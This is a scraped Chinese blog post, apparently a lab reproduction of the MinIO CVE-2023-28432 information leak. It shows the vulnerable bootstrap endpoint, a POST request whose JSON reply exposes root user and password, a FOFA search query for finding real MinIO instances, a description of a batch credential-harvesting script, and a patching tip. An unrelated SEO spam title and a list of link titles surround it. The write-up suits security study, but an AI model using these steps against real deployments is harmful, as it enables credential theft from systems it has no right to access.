当前位置: 首页 > news >正文

基于web的旅游网站建设百度站长平台网站提交

基于web的旅游网站建设,百度站长平台网站提交,象山网站优化公司,电商运营岗位职责前言:MinIO是一个用Golang开发的基于Apache License v2.0开源协议的对象存储服务。虽然轻量,却拥有着不错的性能。它兼容亚马逊S3云存储服务接口,非常适合于存储大容量非结构化的数据。该漏洞会在前台泄露用户的账户和密码。 0x00 环境配置 …

前言:MinIO是一个用Golang开发的基于Apache License v2.0开源协议的对象存储服务。虽然轻量,却拥有着不错的性能。它兼容亚马逊S3云存储服务接口,非常适合于存储大容量非结构化的数据。该漏洞会在前台泄露用户的账户和密码。

0x00 环境配置

此次实验,我们继续使用P神的Minio的docker环境。启动环境:

cd /vulhub-master/minio/CVE-2023-28432/
docker-compose up -d

启动完成后访问http://your-ip:9001为集群的web管理页面,另外http://your-ip:9000为集群的API接口。

0x01 触发漏洞

这个漏洞的节点存在于这个路径:http://your-ip:9000/minio/bootstrap/v1/verify
对该路径发送POST请求会返回一段JSON数据:

{"MinioEndpoints":[{"Legacy":true,"SetCount":1,"DrivesPerSet":3,"Endpoints":[{"Scheme":"http","Opaque":"","User":null,"Host":"node1:9000","Path":"/mnt/data1","RawPath":"","OmitHost":false,"ForceQuery":false,"RawQuery":"","Fragment":"","RawFragment":"","IsLocal":true},{"Scheme":"http","Opaque":"","User":null,"Host":"node2:9000","Path":"/mnt/data2","RawPath":"","OmitHost":false,"ForceQuery":false,"RawQuery":"","Fragment":"","RawFragment":"","IsLocal":false},{"Scheme":"http","Opaque":"","User":null,"Host":"node3:9000","Path":"/mnt/data3","RawPath":"","OmitHost":false,"ForceQuery":false,"RawQuery":"","Fragment":"","RawFragment":"","IsLocal":false}],"CmdLine":"http://node1:9000/mnt/data1 http://node2:9000/mnt/data2 http://node3:9000/mnt/data3","Platform":"OS: linux | Arch: amd64"}],"MinioEnv":{"MINIO_ACCESS_KEY_FILE":"access_key","MINIO_CONFIG_ENV_FILE":"config.env","MINIO_KMS_SECRET_KEY_FILE":"kms_master_key","MINIO_ROOT_PASSWORD":"minioadmin-vulhub","MINIO_ROOT_PASSWORD_FILE":"secret_key","MINIO_ROOT_USER":"minioadmin","MINIO_ROOT_USER_FILE":"access_key","MINIO_SECRET_KEY_FILE":"secret_key"}}

在该json字段中,我们可以看到MINIO_ROOT_USER字段包含账户名,MINIO_ROOT_PASSWORD字段包含账户的密码。所以该信息泄露其实就是API接口的信息泄露。我们可以根据这个特性,写一个批量的脚本文件来检测,并将其中的关键信息返回。

0x02 POC利用

先在FoFa或者鹰图上面收集跟MinIO集群相关的资产。
banner=“MinIO” || header=“MinIO” || title=“MinIO Browser”
脚本相关较为敏感,若有需要可以加群下载。
其实脚本比较简单,就是向这个漏洞URL发送请求,判断返回包是否包含敏感字段。
如果包含就说明有敏感JSON字段,最后对这个JSON数据进行解析,拿出其中我们需要的两个字段即可。下图为利用效果。

0x03 加固建议

升级官方最新补丁可以修复该漏洞。

http://www.hengruixuexiao.com/news/55439.html

相关文章:

  • 西安优化网站技术谷歌怎么投放广告
  • 做网站需要用到什么技术网站软文是什么
  • 广州网站建设外包企业营销策略分析论文
  • 做土建资料有什么网站没网站策划书
  • thinphp 做外贸网站无锡百姓网推广
  • 在网上帮做图片的网站收录
  • 游戏设计需要学什么专业网站打开速度优化
  • 天津网站推广公司哪家好电商网站建设公司
  • 网站规划和网站建设站长之家站长工具综合查询
  • 苏州网站公司百度推广代理商加盟
  • 设计制作网站制作百度推广平台登录入口
  • 南京电商网站开发公司网络平台推广运营有哪些平台
  • 网站开发语言 asp西安危机公关公司
  • 广州海珠区房价咸阳seo公司
  • 东莞手机网站计算机培训机构哪个最好
  • 英文网站 字体大小怎么注册域名网址
  • 做淘宝客网站十大舆情网站
  • 万户网络app优化大师手机版下载
  • 数据分析师考试科目学seo哪个培训好
  • 北京住建网站其中包括
  • 简约大方网站手机制作网页用什么软件
  • 网站建设基本要点百度统计收费吗
  • 云南做网站价格青岛网络推广
  • 贵阳做网站公司排名做百度推广销售怎么样
  • 东莞网站建设网站推广价钱seo怎么做教程
  • 域名备案 填写网站信息吗b2b网站大全
  • 网站制作 牛商网建立网站的几个步骤
  • WordPress底部添加版权注明南京seo代理
  • 互联网门户网站建设关键词林俊杰在线听免费
  • 瑞安自适应网站建设网络广告文案案例